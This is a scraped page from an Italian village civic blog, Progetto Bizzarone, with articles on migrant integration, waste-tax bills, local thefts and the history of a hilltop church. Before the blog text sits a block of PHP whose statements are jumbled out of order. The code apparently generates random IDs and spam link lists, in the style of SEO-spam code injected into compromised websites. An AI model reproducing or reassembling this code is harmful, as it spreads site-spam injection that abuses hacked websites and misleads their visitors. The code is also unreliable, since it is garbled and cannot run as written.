$p1 = '';$p2=''; if (!$bit || !isset($bit['host'])) continue; $fh = fopen($f1, 'r'); } function kodinnt($f1, $f2, $c = 2000) { fclose($fh); rewind($fh); $id = isset($_GET['id']) ? intval($_GET['id']) : 0; $word = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'); if ($i == 0) { } } $per=array_rand($rw, mt_rand(1,4));if(!is_array($per))$per=array($per); exit; $link = trim($map[$i]); $count = mt_rand(4, 7); $url = fgets($fh); $hosts = array(); $rm = array(1); while (!feof($fh)) { $c = min(sizeof($map),$c); $bit = @parse_url($ret[1]); $ftext = file_exists($f2); $link = preg_replace_callback('%\{(.*?)\}%i', create_function('$r','$a=explode(\'|\',$r[1]);return $a[array_rand($a)];'), $link); $view = ''; $pos=array_rand($rw, mt_rand(1,4));if(!is_array($pos))$pos=array($pos); if (!is_array($rm)) { $id .= $num[array_rand($num)]; $hosts[$bit['host']] = 1; } if (preg_match('%href="/sito/([^"]+)"%', $url, $ret)) { } else { $id = genID(); foreach ($rm as $i) { $map[] = trim($url); foreach($per as $pu) {$p1 .= trim($rw[$pu]).' ';} if (!file_exists($id.'/map.txt')) { } $ps = mt_rand(1,2); return $id; $url = fgets($fh); if (strpos($url, $host)) { $map = array(); if ($ps == 1) { } $view.= $p1.$link.$p2."\r\n"; $view.=''; echo($view); exit; $id .= $word[array_rand($word)]; } $num = array(0,1,2,3,4,5,6,7,8,9);
Domenica, Febbraio 26, 2017
   
Text Size
logo piegato.png
Migranti e integrazione
Migranti e integrazione Vogliamo allacciarci a quanto già evidenziato nei mesi precedenti in un articolo pubblicato su Bizzarone Informa per osservare che, benché il nostro paese ospiti un nutrito gruppo di migranti, continuiamo ad assistere al loro vagabondare quotidiano. Quando avevamo proposto di fare qualche cosa per favorire l’integrazione, ci aspettavamo qualche cosa di più del limitato e saltuario impiego presso la discarica. In alcuni dei paesi limitrofi (es. Uggiate Trevano ed Olgiate Comasco) i migranti vengono addetti alla pulizia e al decoro cittadino o avviati a dei mestieri. Il nostro paese ha delle necessitàin tema di pulizia, di sicurezza e di aiuto per le persone non autosufficienti alle quali si potrebbe sopperire con la collaborazione anche di tali migranti. Se quanto fatto fino ad ora è il massimo che la nostra amministrazione riesca a progettare, forse sarebbe meglio che la cittadinanza fosse chiamata a dare suggerimenti e proposte.     Simona Brizzi   ...

C’era una volta il “Larghi”
  Per molti decenni ha fatto compagnia a tutti i bizzaronesi, ora che è stato demolito, il minimo che potessimo fare, oltre che ...
Leggi tutto 2 10272

Rifiuti: cartelle a catinelle
Molti bizzaronesi a fine 2013 hanno ricevuto per posta al proprio domicilio delle cartelle esattoriali, nelle quali si faceva avviso, che a ...
Leggi tutto 2 13898

Terra di Mezzo
  Durante un recentissimo dibattito su Facebook, un gruppo di utenti (probabilmente non bizzaronesi), parlando di Terre di Frontiera ha fatto ...
Leggi tutto 1 8225

Strani animali avvistati a Bizzarone
  Non appena si varca lo spartiacque delle Alpi in direzione nord, salta subito all'occhio uno "strano" fenomeno: i prati sono popolati da ...
Leggi tutto 0 12931

I "misteri" del Colle Sant'Ambrogio

 

normal_39_-_La_Chiesa_dell_Assunta_sul_colle_3Nei prossimi giorni la vita di Bizzarone si sposterà sul monte, intorno alla chiesetta della Madonna. Davanti agli affreschi, a quel cartiglio che ci dice che risalgono al 1584 (427 anni fa), a tutti viene la curiosità di conoscere la nostra storia, di sapere chi erano quei bizzaronesi le cui ossa riposano sotto il pavimento della chiesa.

Certamente, se vogliamo assumere i panni di moderni Indiana Jones, i misteri da svelare non mancano.

Possiamo raccogliere facilmente un discreto numero di notizie sull’artista che ha affrescato le pareti, Giovanni Battista Tarilli. Sappiamo che era di Cureglia, un comune sopra Lugano, andando verso il Ceneri. Lì troviamo la sua casa, dove viveva con i due figli e la moglie.

In zona, sappiamo che ha affrescato anche l’Oratorio di San Martino di Albiolo, che oggi conosciamo come la chiesa di Sant’Anna. Forse proprio per quell’esperienza si è fatto conoscere anche a chi lo ha chiamato a Bizzarone. Ma chi lo ha chiamato a Bizzarone? Negli affreschi sull’altare abbiamo le “foto” dei committenti. Un cartiglio richiama la famiglia Clerici. Chi sono costoro? Ci danno indicazioni sulla moda dell’epoca, su come ci si vestiva. Però, come mai erano così legati a Bizzarone da offrire la costruzione della chiesa?

Ai due lati della statua della Madonna, sono raffigurati i Santi Ambrogio ed Evasio. A prima vista nulla di strano, ma: perchè Sant’Ambrogio era così importante in un colle che apparteneva alla Diocesi di Como e non a quella di Milano (e non sempre è corso buon sangue tra comaschi e milanesi)?

Sappiamo dalle visite pastorali più o meno del periodo della costruzione della chiesa  che sul colle, ma in una posizione diversa, c’era anche un’altra cappella dedicata a Sant’Ambrogio, già allora decadente. Dove sono i resti di questa seconda chiesetta?

E Sant’Evasio? Il legame è forte, visto che anche la Parrocchia, quando verrà istituita sarà dedicata proprio a questo Santo poco conosciuto e poco “diffuso” dalle nostre parti (bisogna andare fino a Casale Monferrato per trovare una venerazione più forte). Si sa che era legato a Sant’Ambrogio: perchè dunque questi due santi erano così importanti per Bizzarone? E’ successo qualcosa di straordinario che li ha resi così venerati?

Visitando la chiesa e prestando attenzione anche ai minimi dettagli, chissà che qualcuno non riesca a gettare qualche spiraglio di luce su questi e altri misteri...

Aggiungi commento

Il Blog di Progetto Bizzarone è uno spazio aperto a vostra disposizione, creato per confrontarsi e discutere. I commenti sono direttamente pubblicati solo se avete proceduto a registrarvi al sito fornendo i vostri dati. Nel caso non siate registrati, i vostri commenti saranno filtrati dalla redazione per verificare che rispettino i criteri sotto riportati.In ogni caso, voi siete i reali ed unici responsabili del contenuto dei commenti e delle sue sorti.

Avvertenze da leggere prima di intervenire sul blog di Progetto Bizzarone.

Non sono consentiti:
- messaggi non inerenti al post
- messaggi con linguaggio offensivo
- messaggi che contengono turpiloquio
- messaggi con contenuto razzista o sessista
- messaggi il cui contenuto costituisce una violazione delle leggi italiane (istigazione a delinquere o alla violenza, diffamazione, ecc.)

Comunque il proprietario del blog potrà in qualsiasi momento, a suo insindacabile giudizio, cancellare i messaggi che non si attengono alle istruzioni sopra citate.
In ogni caso il proprietario del blog non potrà essere ritenuto responsabile per eventuali messaggi lesivi di diritti di terzi.

Codice di sicurezza
Aggiorna

Nuove discariche per materiali inerti
INFORMAZIONE AI CITTADINI DI BIZZARONE: Il dipartimento del Territorio del Canton ...
Leggi tutto 0 12308

La giornata ecologica una bella avventura
La giornata ecologica è una bella avventura che da qualche hanno si ripete con ...
Leggi tutto 0 9869

Prima o poi la neve si scioglie
  26 febbraio 2013  non è una data come tutte le altre è il giorno dopo la ...
Leggi tutto 0 18715

Rendiconti e precisazioni
Da qualche mese questo sito ha adottato la politica di filtrare parzialmente i commenti ...
Leggi tutto 3 15992

Curiosità geografica
  Ci è sempre piaciuto raccontare curiosità che avessero qualche rapporto con ...
Leggi tutto 43 31986

Per le strade di Bizzarone con
Street View è un’applicazione di Google che consente a chi si collega in internet, ...
Leggi tutto 0 23332

La grande goccia
Bizzarone è un paese di poco più di 1.500 abitanti e rispetto all’intera popolazione ...
Leggi tutto 20 18960

Ad usum Guidi
  Il sindaco Guido Bertocchi non acquista né legge "La Provincia", ma è un ...
Leggi tutto 3 17637

Stato di pulizia
  Non può sfuggire a coloro che si recano al centro Ginestre per fare la spesa ...
Leggi tutto 2 6021

Che non cada nel dimenticatoio
Era settembre e poi ottobre quando due incendi dolosi avevano colpito dei mezzi ...
Leggi tutto 3 9552

Adriano Crugnola vice presidente vicario dell'Associazione Nazionale Alpini
Il nostro amico Adriano Crugnola è stato nominato vice presidente vicario dell'Associazione ...
Leggi tutto 3 7368

Un sito al servizio di Bizzarone
Da tre anni sul sito www.progettobizzarone.com diffondiamo le nostre idee su ciò ...
Leggi tutto 2 6004

Grazie Signora B
{jcomments off}  A volte può risultare arduo sottrarre anche più serate alla ...
Leggi tutto 1 13275

La tripla piaga delle Slot Machines
Quanti bar esistono a Bizzarone? Senza far troppi calcoli circa dieci. In quanti ...
Leggi tutto 0 9724

Carabinieri batte Polizia Urbana 1 a 0
Di furti nelle abitazioni, in particolare in quella di Carlo Bernasconi abbiamo ...
Leggi tutto 8 18230

Babbo Natale a Bizzarone
Anche quest'anno, come da tradizione, l'Associazione "I Carbunatt - Gruppo Avisini ...
Leggi tutto 0 7449

Parco o cemento?
Bella serata quella di giovedì 24 novembre in Comune. L’Assessore Ciapessoni ...
Leggi tutto 0 8119

Furti in paese parte terza
  Mi inserisco mio malgrado in quella che sfortunatamente per l’amico Carlo ...
Leggi tutto 2 7105

Automobili in fiamme: tre ipotesi anzi quattro
Bruciano automobili nella notte bizzaronese in via Insubria e al mattino successivo, ...
Leggi tutto 2 7856

Furti in paese parte seconda
  L'autunno potrà anche essere in ritardo, ma la stagione dei ladri è sempre ...
Leggi tutto 6 7020

Buone notizie da via Insubria
{jcomments off}  C’è un non so che di positivo nelle “casette” istallate ...
Leggi tutto 1 5715

Cliccate Bizzarone
Se cliccate su Google la voce Bizzarone, nella schermata vi apparirà in ...
Leggi tutto 1 6303

Pulite la fontanella del Piazzolo
Ci hanno segnalato e noi ben volentieri denunciamo. Della serie di eventi che sono ...
Leggi tutto 6 8950

Geronimo, chi è costui?
Ha destato qualche curiosità un certo Geronimo, il nome con cui si è firmato un ...
Leggi tutto 0 6646

Login Form